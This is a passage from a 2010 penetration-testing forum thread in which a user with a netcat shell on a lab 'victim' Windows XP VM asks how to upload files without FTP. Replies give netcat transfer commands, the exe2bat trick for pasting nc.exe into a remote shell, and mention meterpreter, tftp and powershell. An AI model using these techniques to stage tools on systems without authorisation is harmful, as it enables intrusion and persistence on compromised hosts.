I'm not sure if you can do that but a nice way is meterpreter do upload files on the victim.
I have 2 PC work in VBOX and hosted on Backtrack 4 final i make connect by NetCat to that VBOXs and i got this in backtrack 4:
and i want copy file to that PC without using FTP.
Last edited by skull2006; 08-07-2010 at 10:54 AM.
I see it before but i forget to but it in my skull all what i remember it's convert the EXE file to "I don't know" and make edit to that file copy all contain and go to DOS session and paste it there.
and i remember after you paste it type this " > Filename.exe " hit Enter """"
Last edited by skull2006; 08-07-2010 at 02:58 PM. Reason: More Details
Try something like this:
Code:nc -l -p 1234 > file.txt (on the victim) nc destination 1234 < file.txt (attacker)
root@skull:~# cd /pentest/windows-binaries/tools/
root@skull:/pentest/windows-binaries/tools# wine exe2bat.exe nc.exe nc.bat
Finished: nc.exe > nc.bat
You will have HEX file of netcat if i copy the HEX and i paste it in DOS command prompt i will get nc.exe file.
but when i make it in :
root@skull:~# nc -v 192.168.0.203 2222
192.168.0.203: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.0.203] 2222 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\> "when i paste it here the Connection will disconnect"
And in the Windows VBOX i got part of the file.
so is there any other idea?
Darn ... well that beats me I have no ideea why the connection closes and the victim machine is left with only a part of the code ... Try sending something slammer or if not use the method I told you in my previous post
I don't know if this will help you, but it is worth a try. Try to use the "-w secs" option on netcat. The following link is a tutorial about someone transmitting files through netcat while using the "-w" option. http://www.securitydocs.com/library/3376
So a couple of options for you (btw I recommend you do the PWB course, there's a good set of transfers in that), but if it is hanging on that part, fire up a copy of wireshark on the windows unit and see what's happening - if the packets are being received but there's no error reporting, there may well be a bit of silliness in the nc -e stuff - you should hit enter a few times to see if you get a prompt returned.
Also try to break the lines up a bit, sending the entire bit stream in one go isn't the sanest idea in the world (and you've missed out the >> 123.hex from the second echo line - forum typo?), so you should try to play with that.
My option is usually tftp where I can get it, or powershell where that's necessary, but plain ol' echo commands have gotten me through more than once
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.